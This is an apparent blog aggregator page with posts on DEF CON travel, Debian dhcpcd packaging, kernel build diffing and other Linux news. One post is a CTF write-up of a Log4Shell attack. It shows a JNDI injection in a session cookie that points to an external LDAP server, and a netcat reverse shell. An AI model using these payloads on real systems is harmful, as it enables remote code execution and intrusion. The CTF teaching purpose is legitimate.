I’ll also have my Pixel 6 Pro, but won’t bring any work tech along with me – I’m fortunate to not be in an urgent/oncall role, and this allows me to better focus on what I’m doing there instead of what’s going on in the office. Though battery life has gotten pretty good for a lot of phones, I’ll still bring a backup battery bank. There are even ones capable of charging many laptops available, though they get a bit bulky and heavy.

I’ll cover protecting your tech down below, but the short form is that I have no problem bringing things (laptop, phone, etc.).

Packing

Look, it’s Las Vegas in August. You don’t need to check a weather forecast to know that it’s going to be hot. Reaching 45℃ (113℉) is not out of the question. There’s not likely to be much rain, but I have seen it a time or two. Wind is a definite possibility, though. Dress accordingly.

In the casinos and the conference areas, the air conditioning is often on full blast. I’m personally comfortable in a T-Shirt and jeans or shorts, but if you’re prone to being cold under such conditions, a lightweight hoodie or jacket might not be a bad idea.

I have two schools of thought on carrying things with me. Some years, I have intentionally used a smaller backpack to avoid lugging so much stuff around with me for days on end. This does work out, but then I end up wishing I had certain other items. The other extreme is carrying my EDC backpack full of gear and a sore back after a couple of days. Carrying the smaller backpack is probably the better decision, but I can’t say I’m always known for making the best decisions.

It may seem a bit anachronistic, but I also suggest carrying a small notebook (I’m quite partial to Field Notes with Dot-Graph paper) and pen. To this day, I still find it easier to make quick notes on pen and paper than on my phone, especially if I need a diagram or drawing of any sort. (It also requires no recharging.)

Safety

Stay Healthy

Addressing the elephant in the room, there is still a pandemic going on, and new variants all the time. Everyone has already made up their mind on vaccinations, so I’m not going to try to push anyone on that, but I will strongly suggest bringing some tests with you to Las Vegas. If you test positive, please don’t come to the conferences and infect others. Yes, missing out on part of con will suck, but it’s still the right thing to do. DEF CON and BSidesLV are both requiring masking at all times (consider ear savers), except when eating, drinking, or presenting. Neither is requiring proof of vaccination.

Even prior to the pandemic, Hacker Summer Camp posed its own health challenges. Inadequate sleep is nearly universal, and drinking, heat, and dry air can quickly lead to dehydration. Drinking water is absolutely critical. I strongly recommend bringing an insulated water bottle, and you can refill from water fountains in the conference space. Bottled water in the hotels is extremely expensive (I believe most people would call it a “rip-off”) but if you want to get bottled water, I suggest going to CVS, or the ABC convenience stores on the Strip. (Fun fact, those stores also sell alcohol at pretty reasonable prices if you want to have a drink in your room. Hotel rules would definitely preclude carrying a flask in the conference space, so no hackers would ever do that.)

I particularly hate the heat, so I also bring a couple of “cooling towels” – you dampen them, and the evaporating water causes them to cool off, consequently cooling you off. They also make a great basic towel for wiping sweat away or any other quick use. I was skeptical when I first heard of them, but they really work to make you feel cooler.

Physical Safety

Las Vegas is a bit of a unique city in that it’s built entirely around the tourism industry. This is even more true on or near “The Strip”, the section of Las Vegas Boulevard from The STRAT to Mandalay Bay (just north of Reid Airport). Every scam you can imagine is being played here as well as many you won’t even have thought of. Your Social Engineering instincts should be on high alert.

Pickpocketing and theft of anything unattended are both commonplace on the strip, but robbery is less so. It’s more your belongings than you yourself that are at risk. Stay in a group if you can.

Know that the street performers have an expectation of getting paid if you take a photo with them. This ranges from a guy in a poor Mickey Mouse costume to women dressed up as Las Vegas showgirls. It may get confrontational if you take a photo and try not to tip them at all, but also don’t let them rip you off if you decide to do this.

Electronic Safety

If you have fully up-to-date (patched) devices, I do not believe the risk of compromise to be especially high. Consider the value of 0-day exploits in modern platforms along with the number of reverse engineers and malware analysts present who might get a copy, resulting in the 0-day being “burned”. To the best of my knowledge, no device I’ve ever taken has been compromised. (And yes, I used to take “burner” devices, my views on this have evolved over the years.)

If you have a device that can’t run the latest available OS (i.e., no longer receives Android or iOS Updates), I strongly recommend upgrading, whether or not you plan to bring it to DEF CON. Unfortunately there are enough browser and similar bugs that affect older OSs that they’re basically unsafe on any public network, not just the ones at these conferences.

At DEF CON, they provide both an “open” network (on which there are plenty of shenanigans, but not modern OS 0-day as far as I’m aware) and a “secure” network that uses 802.1x authentication with certificates (make sure you verify the network certificate) and also prevents client-to-client traffic.

I do recommend not bringing any particularly sensitive data, and having a thorough backup before your trip.

VPNs are a bit of a controversial topic in the security space right now. Too many providers pretend they can offer things they can’t. At a simple level, your traffic is eventually egressing onto the public internet, and it’s not end-to-end encrypted. If you’re in the security space and not familiar with how commercial VPNs work, now might be a great time to look more into it. I do think they have value on open wireless networks because the opportunity for meddler-in-the-middle attacks is less on a VPN than on the open WiFi. I personally use Private Internet Access but there are many options out there.

FAQs

What’s a Goon?

DEF CON Goons are the volunteer army that help make sure DEF CON occurs as successfully and safely as possible. While they have a bit of a reputation for their loudness and directness, their goal is to keep things moving and do so safely. They can be identified by their red DEF CON badges.

Where can I learn more about the history of DEF CON?

I’m hardly a historian, but I can recommend checking out the DEF CON documentary produced by Jason Scott at DEF CON 20 in 2012.

What is Badgelife?

The official DEF CON badges eventually inspired other creators to get into the space of making badges as well. These may be electronic, laser cut, hand crafted, and more. Some will be sold publicly, others are given out to friends, and still others may be associated with an activity in one of the villages. These are often called “unofficial badges” since they are not associated with the DEF CON organizers and they don’t gain you access to the conference. (Some may gain you access to parties and events run by their creators, however.)

The electronic component shortage associated with the pandemic has slowed things down a bit, but this space appears poised to make a comeback this year or so. At the end of the day, Badgelife is just a particularly nerdy form of art. (I’ve been a small-volume badgelife creator for a few years, so I feel well positioned to acknowledge the nerdiness.)

Where Can I See Past Talks?

The DEF CON Media Server has all the media from every DEF CON held, but not every DEF CON had talks recorded. Many of the videos have also been uploaded to YouTube.

Black Hat posts some of the videos from their conferences to their YouTube page. Likewise, BSidesLV has a YouTube page with their talks. Finally, The Diana Initiative has also uploaded their videos from 2021. (Though apparently none from before that time, at least that I could locate.)

What is the Rule on Photography?

Until about 10 years ago, the rule was no photography allowed, but now that basically everyone carries a camera with them wherever they go (my phone actually has 4 separate cameras), it’s been updated a bit:

Everyone in the photo must consent to having their photo taken at both DEF CON and BSidesLV. (And, quite frankly, this is good advice for life in general.) This includes individuals in the background, etc. There may also be areas (Skytalks, Mohawkcon) that absolutely prohibit photography. I have personally witnessed individuals removed from events for violating this rule.

At DEF CON 15, an undercover reporter was chased from the event. While the events do allow press, they are required to register as such (which earns them a specially-colored badge) and the policies require they identify themselves as press to participants.

A reporter coming “undercover” hoping to catch individuals openly discussing criming in the hallways is likely to be very disappointed. You’re far more likely to catch people mocking the security industry itself.

I Don’t Know Anyone – How Do I Meet People?!

I struggle with this myself, but the Lonely Hackers Club has a great guide.

Closing

I hope some of these tips have been helpful to at least some of you. :) Feel free to reach me on Twitter with any feedback you might have. If you want to get into the right mindset, I highly recommend checking out the music CDs or live recordings from past DEFCONs or checking out Dual Core Music.

on July 20, 2022 07:00 AM

Tobacconists hate him.

It’s that time of the year. I never really know who this sort of post is for. Maybe it’s for you, maybe it’s for me one dark day in the future, but…

🎉  I stopped smoking ten years ago!

If somebody as flimsy-willed as me can stop smoking, you can stop smoking too. I’m not going to labour the “it kills you” thing, but it is, so here’s the financial breakdown for any fellow cheapskates.

  10 years =  3,652 days
@13/day = 47,476 cigs
= 2,374 packs

2012 price = £7.10 /pack
2022 price = £12.50 /pack
Mean price = £9.80 /pack

I’ve not smoked £23,265.20.

If I’d regularly deposited that into an investment account, at a 2% return it would be £25k, and at 5% almost £30k.

I’d say I feel fantastic but I am also ten years older. I gained two children and a dog, and everything hurts. But I don’t smoke. I don’t feel the urge to smoke, and haven’t for years. I never have to stand outdoors on cold, wet nights to smoke. I don’t panic when I’m running out of cigarettes. And that means a lot.

It’s easier to just not smoke

You might not be convinced and that’s because we’re all told it’s really hard to stop smoking. All the time. Even by people who want smokers to quit, as if it’s something that takes a run-up, an intake of bravery and team-cajoling. It’s not hard; just stop smoking the bloody things.

The rest is understanding your body and addiction: smoking never made you feel better, it only made not smoking feel worse. As soon as you cut that cycle, your body recalibrates. As soon as you realise that, the infinitesimal cost of quitting seems worth it.

If you’re trying to quit and you’re not finding it easy, stick with it. If you need help understanding addiction, Allen Carr’s Easy Way to Stop Smoking has an eerily convincing narrative that plods through the feelings every smoker goes through. I never finished it —I convinced myself I didn’t want to quit— but it was absolutely the basis for the voice in my head that let me quit later on.

on July 20, 2022 12:00 AM

July 19, 2022

The Lubuntu Team is happy to announce that the Lubuntu Backports PPA is now available for general use. You can find details on enabling it in this blog post.
on July 19, 2022 09:45 PM

July 17, 2022

Full Circle Weekly News #270

Full Circle Magazine


SFC urges open source projects to stop using GitHub:
https://sfconservancy.org/blog/2022/jun/30/give-up-github-launch/

Porteus 5.0 distribution released:
https://forum.porteus.org/viewtopic.php?f=35&t=10183

Release of Zabbix 6.2:
https://www.zabbix.com/documentation/6.2/manual/introduction/whatsnew620

The KDE project introduced their fourth generation of KDE Slimbooks:
https://kde.slimbook.es/

Oracle Linux 9 and Unbreakable Enterprise Kernel 7 available:
https://blogs.oracle.com/linux/post/announcing-oracle-linux-9-general-availability

NIST Approves Quantum Resistant Encryption Algorithms:
https://groups.google.com/a/list.nist.gov/g/pqc-forum/c/G0DoD7lkGPk

Lennart Pottering left Red Hat and joined Microsoft:
https://www.phoronix.com/scan.php?page=news_item&px=Systemd-Creator-Microsoft

Release of SpaceVim 2.0:
https://spacevim.org/SpaceVim-release-v2.0.0/

Ubuntu MATE distribution has generated builds for the Raspberry Pi:
https://ubuntu-mate.community/t/ubuntu-mate-22-04-lts-for-raspberry-pi-is-out-now/25634

wxWidgets 3.2.0 graphical toolkit:
https://wxwidgets.org/news/2022/07/wxwidgets-3.2.0-final-release/

Bacula 13.0.0 Available:
https://www.bacula.org/bacula-release-13-0-0/

Microsoft introduces a ban on the sale of open source software through the Microsoft Store:
https://sfconservancy.org/blog/2022/jul/07/microsoft-bans-commerical-open-source-in-app-store/

nDPI 4.4 Deep Packet Inspection Released:
https://www.ntop.org/ndpi/introducing-ndpi-4-4-many-new-protocols-improvements-and-cybersecurity-features/

Debian 11.4 update:
https://www.debian.org/News/2022/20220709

rclone 1.59  released:
https://forum.rclone.org/t/rclone-1-59-0-release/31808

Release of Libreboot 20220710, a completely free distribution of Coreboot:
https://libreboot.org/news/libreboot20220710.html




Credits:
Full Circle Magazine
@fullcirclemag
Host: bardmoss@pm.me, @bardictriad
Bumper: Canonical
Theme Music: From The Dust - Stardust
https://soundcloud.com/ftdmusic
https://creativecommons.org/licenses/by/4.0/
on July 17, 2022 04:58 PM

July 14, 2022

As of July 14, 2022, all flavors of Ubuntu 21.10, including Ubuntu Studio 21.10, codenamed “Impish Indri”, have reached end-of-life (EOL). There will be no more updates of any kind, including security updates, for this release of Ubuntu.

If you have not already done so, please upgrade to Ubuntu Studio 22.04 LTS via the instructions provided here.

No single release of any operating system can be supported indefinitely, and Ubuntu Studio is no exception to this rule.

Regular Ubuntu releases, meaning those that fall between the Long-Term Support releases, are supported for 9 months; users are expected to upgrade after every release, with a 3-month buffer following each one.

Long-Term Support releases are identified by an even-numbered year-of-release and a month-of-release of April (04). Hence, the most recent Long-Term Support release is 22.04 (YY.MM = 2022.April), and the next Long-Term Support release will be 24.04 (2024.April). LTS releases of official Ubuntu flavors (unlike Desktop and Server, which are supported for five years) are supported for three years, meaning LTS users are expected to upgrade after every LTS release, with a one-year buffer.

on July 14, 2022 12:00 PM

July 13, 2022

It so happens that I spent a good few hours today finally trying to figure out why my autocompletion was broken on my shiny new MacBook Pro M1 Pro…

despite Homebrew’s brew doctor giving me the all clear.

foursixnine@pakhet ~ % brew doctor
Your system is ready to brew.

Turns out that it was just the shell:

foursixnine@pakhet ~ % echo $FPATH
/opt/homebrew/share/zsh-completions:/usr/local/share/zsh/site-functions:/usr/share/zsh/site-functions:/usr/share/zsh/5.8.1/functions

My user’s shell was still set to macOS’s stock zsh 5.8.1…

So after hours of searching the internet to no avail, and scratching my head, I came back to my initial idea of just switching the shell:

echo "export PATH=/opt/homebrew/bin:$PATH" >> ~/.zshenv
sudo sh -c "echo $(which zsh) >> /etc/shells"
chsh -s $(which zsh)
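
For what it’s worth, a quick sanity check after opening a new terminal (a sketch; the path assumes Homebrew on Apple Silicon):

echo $SHELL    # should now print /opt/homebrew/bin/zsh
zsh --version  # should report Homebrew's zsh, not the stock 5.8.1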
on July 13, 2022 12:00 AM

July 07, 2022

About GitHub Actions, and why I ended up using ARC: I’d like to share an open source project called GitHub Action Runner Controller (ARC), which I came to use while looking for something I needed at work. Here is its GitHub link. GitHub Actions is used in the software development process to test code you have already written and to automate software releases; for organizations that use container images, as soon as a software release is done […]

on July 07, 2022 06:43 AM

July 04, 2022

https://www.mixcloud.com/dholbach/wednesday-night-at-dubstation-at-fusion-2022/

It was a last-minute request that led me to Fusion this year. One act unfortunately needed to cancel, so Tuesday night I packed things to play at Dubstation the next day.

It was a great experience for me … thanks so much to everyone who turned up and to the lovely team of organisers as well! 💖

  1. Cocotaxi - Cactus
  2. JÇÃO & Caracas Dub - Suena la decadente
  3. Masia One - Warriors Tongue (An-ten-nae Remix)
  4. coss - Come Into My Room
  5. Noema - Twilight (Xique-Xique Nightglow Remix)
  6. Smoke City - Underwater Love (Bendix Edit)
  7. Xique-Xique - Xaxoeira
  8. Ana Tijoux - 1977 (106er Edit)
  9. VON Krup Feat. Alekzal - Fosfenos (jiony Remix)
  10. Xique-Xique - Pirilampos (House Mix 2016 Remaster)
  11. Eartha Kitt - Angelitos Negros (Billy Caso’s Sliced Sky Remix)
  12. The Tribe Of Good - Heroes (edit)
  13. Satori - Days Without You (Crussen Remix)
  14. Dombrance - Taubira (Prins Thomas Diskomiks)
  15. Emanuelle - Italove
  16. 9EYE - Orisa (Dario Klein Remix)
  17. Canu, Nu, Alejandro Castelli - Mariposa (VIKEN ARMAN Remix)
  18. Tunnelvisions - Guava (Extended Mix)
  19. DjeuhDjoah & Lieutenant Nicholson - El Niño
  20. RSS Disco - Pie Pie Pie
  21. LeSale - (I’ve Had) The Time Of My Life (Le Sale’s Second Base Edit) [Dirty Dancing Remix]
  22. hubbabubbaklubb - Mopedbart (Barda Edit)
  23. Crussen - Bufarsveienen
  24. Renegades Of Jazz - Beneath This African Blue (Paradise Hippies Remix)
  25. Takeshi’s Cashew - Akihi (Surv Remix)
  26. Mina & Alberto Lupo - Paroles, Paroles (Gaviño Edit)
on July 04, 2022 07:00 AM

July 03, 2022

Given news that ISC's DHCP suite is getting deprecated by upstream, and seeing how dhclient has never worked properly for DHCPv6, I decided to look into alternatives. ISC itself recommends Roy Marples' dhcpcd as a migration path. Sadly, Debian's package had been left unattended for a good 2 years. After refactoring the packaging, updating to the latest upstream and performing one NMU, I decided to adopt the package.

Numerous issues were exposed in the process:

  • Upstream's ./configure makes BSD assumptions. No harm done, but still...
  • Upstream's ./configure is broken. --prefix does not propagate to all components. For instance, I had to manually specify the full path for manual pages. Patches are welcome.
  • Debian had implemented custom exit hooks for all its NTP packages. Since then, upstream has implemented this in a much more concise way. All that's missing upstream is support for timesyncd. Patches are welcome.
  • I'm still undecided on whether --prefix should assume / or /usr for networking binaries on a Debian system. Feedback is welcome.
  • The previous maintainer had implemented plenty of transitional measures in maintainer scripts, such as symbolically linking /sbin/dhcpcd and /usr/sbin/dhcpcd. Most of this can probably be removed, but I haven't gotten around to verifying this. Feedback and patches are welcome.
  • The previous maintainer had created an init.d script and systemd unit. Both of these interfere with launching dhcpcd using ifupdown via /etc/network/interfaces, which I really need for configuring a router for IPv4 MASQ and IPv6 bridge. I solved this by putting them in a separate package and shipping the rest via a new binary target called dhcpcd-base, following a logic similar to dnsmasq.
  • DHCPv6 Prefix Delegation mysteriously reports enp4s0: no global addresses for default route after a reboot. Yet if I manually restart the interface, none of this appears. Help debugging this is welcome.
  • Support for Predictable Interface Names was missing because Debian's package didn't Build-Depend on libudev-dev. Fixed.
  • Support for privilege separation was missing because Debian's package did not ./configure this or create a system user for this. Fixed.
  • I am pondering moving the Debian package out of the dhcpcd5 namespace back into the dhcpcd namespace. The 5 was the result of an upstream fork that happened a long time ago, and the original dhcpcd package is no longer in the Debian archive. Feedback is welcome on whether this would be desirable.

The key advantage of dhcpcd over dhclient is that it works as a dual-stack DHCP client by design. With privilege separation enabled, this means separate child processes handling IPv4 and IPv6 configuration and passing the received information to the parent process to configure networking and update /etc/resolv.conf with nameservers for both stacks. Additionally, /etc/network/interfaces no longer needs separate inet and inet6 lines for each DHCP interface, which makes for much cleaner configuration files.
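
As a sketch of what that means for ifupdown (interface name assumed), a dual-stack interface shrinks to a single stanza in /etc/network/interfaces:

# before, with dhclient: one stanza per address family
#   iface eth0 inet dhcp
#   iface eth0 inet6 dhcp
# after, with dhcpcd handling both stacks:
auto eth0
iface eth0 inet dhcp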

A secondary advantage is that the dual-stack includes built-in fallback to Bonjour for IPv4 and SLAAC for IPv6. Basically, unless the interface needs a static IP address, this client handles network configuration in a smart and transparent way.

A third advantage is built-in support for DHCPv6 Prefix Delegation. Enabling this requires just two lines in the configuration file.
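
Per dhcpcd.conf(5), those two lines look something like this (the interface names and IAIDs here are only examples):

# request an IPv6 address for the uplink itself
ia_na 1
# request a delegated prefix and assign a /64 from it to the LAN interface
ia_pd 2 eth1/0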

In the long run, I feel that dhcpcd-base should probably replace isc-dhcp-client as the default DHCP client with priority Important. Adequate IPv6 support should come out of the box on a standard Debian installation, yet dhclient never got around to implementing that properly.

on July 03, 2022 08:57 AM

June 24, 2022

As part of the continuing work to replace 1-element arrays in the Linux kernel, it’s very handy to show that a source change has had no executable code difference. For example, if you started with this:

struct foo {
    unsigned long flags;
    u32 length;
    u32 data[1];
};

void foo_init(int count)
{
    struct foo *instance;
    size_t bytes = sizeof(*instance) + sizeof(u32) * (count - 1);
    ...
    instance = kmalloc(bytes, GFP_KERNEL);
    ...
};

And you changed only the struct definition:

-    u32 data[1];
+    u32 data[];

The bytes calculation is going to be incorrect, since it is still subtracting 1 element’s worth of space from the desired count. (And let’s ignore for the moment the open-coded calculation that may end up with an arithmetic over/underflow here; that can be solved separately by using the struct_size() helper or the size_mul(), size_add(), etc family of helpers.)

The missed adjustment to the size calculation is relatively easy to find in this example, but sometimes it’s much less obvious how structure sizes might be woven into the code. I’ve been checking for issues by using the fantastic diffoscope tool. It can produce a LOT of noise if you try to compare builds without keeping in mind the issues solved by reproducible builds, with some additional notes. I prepare my build with the “known to disrupt code layout” options disabled, but with debug info enabled:

$ KBF="KBUILD_BUILD_TIMESTAMP=1970-01-01 KBUILD_BUILD_USER=user KBUILD_BUILD_HOST=host KBUILD_BUILD_VERSION=1"
$ OUT=gcc
$ make $KBF O=$OUT allmodconfig
$ ./scripts/config --file $OUT/.config \
        -d GCOV_KERNEL -d KCOV -d GCC_PLUGINS -d IKHEADERS -d KASAN -d UBSAN \
        -d DEBUG_INFO_NONE -e DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
$ make $KBF O=$OUT olddefconfig

Then I build a stock target, saving the output in “before”. In this case, I’m examining drivers/scsi/megaraid/:

$ make -jN $KBF O=$OUT drivers/scsi/megaraid/
$ mkdir -p $OUT/before
$ cp $OUT/drivers/scsi/megaraid/*.o $OUT/before/

Then I patch and build a modified target, saving the output in “after”:

$ vi the/source/code.c
$ make -jN $KBF O=$OUT drivers/scsi/megaraid/
$ mkdir -p $OUT/after
$ cp $OUT/drivers/scsi/megaraid/*.o $OUT/after/

And then run diffoscope:

$ diffoscope $OUT/before/ $OUT/after/

If diffoscope output reports nothing, then we’re done. 🥳

Usually, though, when source lines move around other stuff will shift too (e.g. WARN macros rely on line numbers, so the bug table may change contents a bit, etc), and diffoscope output will look noisy. To examine just the executable code, the command that diffoscope used is reported in the output, and we can run it directly, but with possibly shifted line numbers not reported. i.e. running objdump without --line-numbers:

$ ARGS="--disassemble --demangle --reloc --no-show-raw-insn --section=.text"
$ for i in $(cd $OUT/before && echo *.o); do
        echo $i
        diff -u <(objdump $ARGS $OUT/before/$i | sed "0,/^Disassembly/d") \
                <(objdump $ARGS $OUT/after/$i  | sed "0,/^Disassembly/d")
done

If I see an unexpected difference, for example:

-    c120:      movq   $0x0,0x800(%rbx)
+    c120:      movq   $0x0,0x7f8(%rbx)

Then I'll search for the pattern with line numbers added to the objdump output:

$ vi <(objdump --line-numbers $ARGS $OUT/after/megaraid_sas_fp.o)

I'd search for "0x0,0x7f8", find the source file and line number above it, open that source file at that position, and look to see where something was being miscalculated:

$ vi drivers/scsi/megaraid/megaraid_sas_fp.c +329

Once tracked down, I'd start over at the "patch and build a modified target" step above, repeating until there were no differences. For example, in the starting example, I'd also need to make this change:

-    size_t bytes = sizeof(*instance) + sizeof(u32) * (count - 1);
+    size_t bytes = sizeof(*instance) + sizeof(u32) * count;

Though, as hinted earlier, better yet would be:

-    size_t bytes = sizeof(*instance) + sizeof(u32) * (count - 1);
+    size_t bytes = struct_size(instance, data, count);

But sometimes adding the helper usage will add binary output differences since they're performing overflow checking that might saturate at SIZE_MAX. To help with patch clarity, those changes can be done separately from fixing the array declaration.

© 2022, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

on June 24, 2022 08:11 PM

Full Circle Magazine #182

Full Circle Magazine

This month:
* Command & Conquer
* How-To : Python, Blender and Latex
* Graphics : Inkscape
* Everyday Ubuntu : Ubuntu Software Centre
* Micro This Micro That
* Review : Kubuntu 22.04
* Review : Fedora 35
* Review : Ebook Readers
* My Story : Calibre
* Ubports Touch
* Ubuntu Games : Catie in Meowmeowland
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot: https://fullcirclemagazine.org/issue-182/

on June 24, 2022 05:19 PM

June 21, 2022

OpenUK Awards 2022

Jonathan Riddell

OpenUK is the non-profit body which promotes Open tech in the UK.

Nominations are now open for the OpenUK Awards 2022.

We’ve run our annual awards ceremony to recognise great Open tech contributions for the last two years with great success, and this year nominations are open for you to join in, or point us to, the best people, organisations and projects that deserve to be rewarded.

Two years ago, during Covid, we had dinner sent to your door. Last year we dined at the centre of the world at COP26. This year we’re Lording it up with a ceremony and dinner in the House of Lords on 30 November.

House of Commons

Last week we had a preview of the event, a delayed Burns supper in the House of Commons. One of the wonderful aspects of Open tech is how it takes you to exciting places and lets you meet interesting people. In this case SNP MPs hosted, and we got to promote KDE and tech freedom.

So please nominate yourself, your project, your company or your org. Or if you know someone else who should be nominated, go and nominate them. We have three fine judges lined up who will go over the entries, so remember to give a good writeup of the work done and why it deserves recognition, along with links to code repos etc. so we can research it.

Categories are: software, sustainability, data, belonging, young person, finance, individual, hardware and security.

Nominate now. And take a look at the 2021 OpenUK awards for more inspiration.

on June 21, 2022 05:27 PM

June 20, 2022

Log4Shell was arguably the biggest vulnerability disclosure of 2021. Security teams across the entire world spent the end of the year trying to address this bug (and several variants) in the popular Log4J logging library.

The vulnerability was caused by special formatting strings in the values being logged that allow you to include a reference. This reference, it turns out, can be loaded via JNDI, which allows remotely loading the results as a Java class.

This was such a big deal that there was no way we could let the next BSidesSF CTF go by without paying homage to it. Fun fact, this meant I “got” to build a Java webapp, which is actually something I’d never done from scratch before. Nothing quite like learning about Jetty, Log4J, and Maven just for a CTF level.

Visiting the given application, we see a basic page with options to login and register along with a changelog:

Login4Shell

The changelog notes that the logger was “patched for Log4Shell” and that there was previously support for sub-users in the format “user+subuser”, but it has allegedly been removed.

Registering an account, we’re requested to provide only a username. The password is given to us once we register. Registering the username “writeup”, we get the password “7fAFsdYlz-oH”. If we login with these credentials, we now see a link to a page called “Flag”, as well as a “Logout” link. Could we just get the flag directly? Let’s check.

Login4Shell Flag

Unfortunately, no such luck. We’re presented with a page containing the following:

Oh come on, it wasn’t going to be that simple. We’re going to make you work for this.

The flag is accessible at /home/ctf/flag.txt.

Oh yeah, your effort to get the flag has been logged. Don’t make me tell you again.

Noting the combination of the logging bug mentioned on the homepage (and the hint from the name of the challenge), as well as the message here about being logged, perhaps this is a place we could do something. Let’s look for anywhere accepting user input.

Other than the login and register forms, we find nothing interesting across the entire app. Attempting to put a log4shell payload into the login and register forms merely yields an error:

Error: Username must be lowercase alphanumeric!

Taking a look at the login process, we see that we get handed a cookie (logincookie) for the session when we login:

eyJ1c2VybmFtZSI6IndyaXRldXAiLCJwYXNzd29yZCI6IjdmQUZzZFlsei1vSCJ9

It might be an opaque session token, but from experience, I know that ey is the base64 encoding of the opening of a JSON object ({"). Let’s decode it and see what we get:

{"username":"writeup","password":"7fAFsdYlz-oH"}

Interestingly enough, our session cookie is just a JSON object that contains the plaintext username and password for our user. There’s no obvious signature or MAC involved. Maybe we can tamper directly with the cookie. If I change the username by adding a letter, it effectively logs me out. Likewise, changing the password gives me the logged-out experience.

Looking back at the “subuser” syntax mentioned on the homepage, I decided to try that directly with the cookie. Setting the username to writeup+a with the same password, the site seems to recognize me as logged-in again. To check if this field might be vulnerable without needing to set up the full exploit ourselves, we can use the Huntress Log4Shell test. Inserting the provided payload gives us the following cookie:

{"username":"writeup+${jndi:ldap://log4shell.huntress.com:1389/d21b4a24-08c8-4d91-9da3-b12fa5f0a472}","password":"7fAFsdYlz-oH"}
eyJ1c2VybmFtZSI6IndyaXRldXArJHtqbmRpOmxkYXA6Ly9sb2c0c2hlbGwuaHVudHJlc3MuY29tOjEzODkvZDIxYjRhMjQtMDhjOC00ZDkxLTlkYTMtYjEyZmE1ZjBhNDcyfSIsInBhc3N3b3JkIjoiN2ZBRnNkWWx6LW9IIn0=

If we set our cookie to that value, then visit the /flag page again so our attempt is logged, we should trigger the vulnerability, as we understand it so far. Doing so, then refreshing our page on Huntress shows the callback hitting their server. We’ve successfully identified a sink for the log4shell payload! Now we just need to serve up a payload.

Unfortunately, this requires an internet-exposed server. There are a couple of ways to do this, such as port forwarding on your router, a service like ngrok, or running a VPS/Cloud Server. In this case, I’ll use a VPS from Digital Ocean.

I grabbed the log4j-shell-poc from kozmer to launch the attack. This, itself, depends on the marshalsec project. This requires exposing 3 ports: LDAP on port 1389, a port for the reverse shell, and a port for an HTTP server for the payload. The LDAP server will point to the HTTP server, which will provide a class file as the payload, which launches a reverse shell to the final port. We launch the PoC with our external IP:

python3 ./poc.py --userip 137.184.181.246

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://137.184.181.246:1389/a}

After starting a netcat listener on port 9001, we send the provided string in our username within the cookie and load the flag page again:

{"username":"writeup+${jndi:ldap://137.184.181.246:1389/a}","password":"7fAFsdYlz-oH"}
eyJ1c2VybmFtZSI6IndyaXRldXArJHtqbmRpOmxkYXA6Ly8xMzcuMTg0LjE4MS4yNDY6MTM4OS9hfSIsInBhc3N3b3JkIjoiN2ZBRnNkWWx6LW9IIn0=

Upon reloading, we see our netcat shell light up:

nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 35.247.118.88 36856
id
uid=2000(ctf) gid=2000(ctf) groups=2000(ctf)
cat /home/ctf/flag.txt
CTF{thanks_for_logging_in_to_our_logs_login_shell}
on June 20, 2022 07:00 AM

June 17, 2022

Help the CMA help the Web

Stuart Langridge

As has been mentioned here before, the UK regulator, the Competition and Markets Authority, are conducting an investigation into mobile phone software ecosystems, and they recently published the results of that investigation in the mobile ecosystems market study. They’re also focusing in on two particular areas of concern: competition among mobile browsers, and in cloud gaming services. This is from their consultation document:

Mobile browsers are a key gateway for users and online content providers to access and distribute content and services over the internet. Both Apple and Google have very high shares of supply in mobile browsers, and their positions in mobile browser engines are even stronger. Our market study found the competitive constraints faced by Apple and Google from other mobile browsers and browser engines, as well as from desktop browsers and native apps, to be weak, and that there are significant barriers to competition. One of the key barriers to competition in mobile browser engines appears to be Apple’s requirement that other browsers on its iOS operating system use Apple’s WebKit browser engine. In addition, web compatibility limits browser engine competition on devices that use the Android operating system (where Google allows browser engine choice). These barriers also constitute a barrier to competition in mobile browsers, as they limit the extent of differentiation between browsers (given the importance of browser engines to browser functionality).

They go on to suggest things they could potentially do about it:

A non-exhaustive list of potential remedies that a market investigation could consider includes:
  • removing Apple’s restrictions on competing browser engines on iOS devices;
  • mandating access to certain functionality for browsers (including supporting web apps);
  • requiring Apple and Google to provide equal access to functionality through APIs for rival browsers;
  • requirements that make it more straightforward for users to change the default browser within their device settings;
  • choice screens to overcome the distortive effects of pre-installation; and
  • requiring Apple to remove its App Store restrictions on cloud gaming services.

But, importantly, they want to know what you think. I’ve now been part of direct and detailed discussions with the CMA a couple of times as part of OWA, and I’m pretty impressed with them as a group; they’re engaged and interested in the issues here, and knowledgeable. We’re not having to educate them in what the web is. The UK’s potential digital future is not all good (and some of the UK’s digital future looks like it could be rather bad indeed!) but the CMA’s work is a bright spot, and it’s important that we support the smart people in tech government, lest we get the other sort.

So, please, take a little time to write down what you think about all this. The CMA are governmental: they have plenty of access to windy bloviations about the philosophy of tech, or speculation about what might happen from “influencers”. What’s important, what they need, is real comments from real people actually affected by all this stuff in some way, either positively or negatively. Tell them whether you think they’ve got it right or wrong; what you think the remedies should be; which problems you’ve run into and how they affected your projects or your business. Earlier in this process we put out calls for people to send in their thoughts and many of you responded, and that was really helpful! We can do more this time, when it’s about browsers and the Web directly, I hope.

If you feel as I do then you may find OWA’s response to the CMA’s interim report to be useful reading, and also the whole OWA twitter thread on this, but the most important thing is that you send in your thoughts in your own words. Maybe what you think is that everything is great as it is! It’s still worth speaking up. It is only a good thing if the CMA have more views from actual people on this, regardless of what those views are. These actions that the CMA could take here could make a big difference to how competition on the Web proceeds, and I imagine everyone who builds for the web has thoughts on what they want to happen there. Also there will be thoughts on what the web should be from quite a few people who use the web, which is to say: everybody. And everybody should put their thoughts in.

So here’s the quick guide:

  1. You only have until July 22nd
  2. Read Mobile browsers and cloud gaming from the CMA
  3. Decide for yourself:
    • How these issues have personally affected you or your business
    • How you think changes could affect the industry and consumers
    • What interventions you think are necessary
  4. Email your response to browsersandcloud@cma.gov.uk

Go to it. You have a month. It’s a nice sunny day in the UK… why not read the report over lunchtime and then have a think?

on June 17, 2022 10:33 AM

June 15, 2022

Dev Ops job?

Bryan Quigley

